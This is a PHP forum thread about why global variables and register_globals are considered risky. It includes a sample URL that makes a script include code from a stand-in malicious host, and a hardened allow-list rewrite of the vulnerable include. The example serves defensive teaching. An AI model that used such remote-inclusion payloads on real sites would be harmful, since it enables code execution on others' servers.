Hi,
I am still fairly new to PHP and I have a question regarding what the security risks are of setting variables GLOBAL.
You hear here and there that it is a 'security risk' and that it is 'bad practice' but I have not found one article on the net that actually describes IN DETAIL why it poses a security risk and why it is bad practice.
Just to clear this up, I am aware that you should never set variables global that hold sensitive information...
Here is a simple example:
I have about 50 pages in a site that all make use of function test (defined below). Function test can use up to 5 variables - 3 are needed - the other 2 are optional depending on the page from which the function is called. As of right now the function looks like this...

```php
function test($var1, $var2, $var3, $var4, $var5)
{
    // do something
}
```
--> as you can see: we call the function and pass in 5 vars on all 50 pages...
Now, if the needed functionality might change in the future, and therefore the vars passed in, I would have to rewrite the code on ALL 50 pages...
So I thought to change the function to this:
```php
function test()
{
    // pull the five values from the global scope instead of taking parameters
    global $var1, $var2, $var3, $var4, $var5;
    // do something
}
```
calling the function then on all 50 pages without the need to pass in vars would make this setup very FLEXIBLE for future changes, as I would just change the number of vars needed inside the function...
Coming back to my original question, what would be the security risk and why would this be 'bad practice' ? I am trying to come up with a solution that is as FLEXIBLE as possible...
Note: all vars used in the function DO NOT hold any sensitive data...
Thanks for your help in advance!!!
- M
Security risk of setting variables global...
Re: Security risk of setting variables global...
I think they mean register globals - there's nothing wrong with what you're doing.
Register globals will populate the script with variables from GET, POST, cookie, etc. data. It's a completely stupid idea.
So say I was coding, and I forgot to define $page as 'index.php', and I was doing include $page;, someone could just go to http://...co.uk/script.php?page=http://nastysite.com/theirscript.php and include their own files.
So that's the security risk.
- kaisellgren
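The forgotten-default include mistake described above, as an added example that is not code from this thread or from PHP itself, with a hardened version next to it; the page names, template paths and function names are made up for illustration, and the allow_url_include check is an extra directive not mentioned in the thread.

```php
<?php
// Added example, not code from this thread. Page names, paths and
// function names are made up for illustration.

// Vulnerable shape. With register_globals on, a request such as
// script.php?page=... initialises $page before this line runs, so the
// forgotten default turns a plain include into inclusion of whatever was sent:
//
//     include $page;   // $page never assigned in this script
//
// Hardened shape: read the input explicitly, never use it as a path, and map
// it onto a fixed allow-list of local templates.
const PAGES = [
    'index'   => __DIR__ . '/pages/index.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the local template path for the request, or null if the request
// names anything that is not in the allow-list.
function resolve_page(array $query): ?string
{
    $key = $query['page'] ?? 'index';      // explicit source, explicit default
    if (!is_string($key)) {                 // page[]=x arrives as an array
        return null;
    }
    return PAGES[$key] ?? null;             // lookup, never concatenation
}

function render_page(array $query): void
{
    $path = resolve_page($query);
    if ($path === null) {
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $path;
}

// Startup checks: refuse to run with the dangerous settings on. register_globals
// was removed in PHP 5.4 (ini_get() then returns false); allow_url_include is
// what lets include() fetch http:// URLs at all.
foreach (['register_globals', 'allow_url_include'] as $directive) {
    if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
        exit("$directive must be disabled");
    }
}
render_page($_GET);
```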
Re: Security risk of setting variables global...
Please put your code inside [code] and [/code] tags.
Avoiding global variables and methods/functions is a good idea. Maybe you would like to read this: http://stackoverflow.com/questions/357187/global-variables-when-are-they-acceptable
As for security, Register Globals are evil. However, if you have them disabled and you are overusing global variables, then you could at some point easily misuse some of your variables as they are all global. A variable being global means it's accessible from everywhere. If you have filtered a variable, which is globally accessible, how are you going to ensure that the variable has not been changed by any other code? This is a bit far-fetched and there are always situations where data might have been changed by some other code, but with globals it can only get worse.
Re: Security risk of setting variables global...
Globals are perfectly fine in many cases though...right?
Say, like, a function which needs access to a class... instead of initialising a new class, or passing it by reference, you could just global the variable that contains it.
Surely that's the better way to do it?
- kaisellgren
Re: Security risk of setting variables global...
Globals can be okay and all PHP functions and classes are basically just global. Currently my application that I'm working on has a few constants that are globally accessible, but they are in my project namespace though (I'm using PHP 5.3).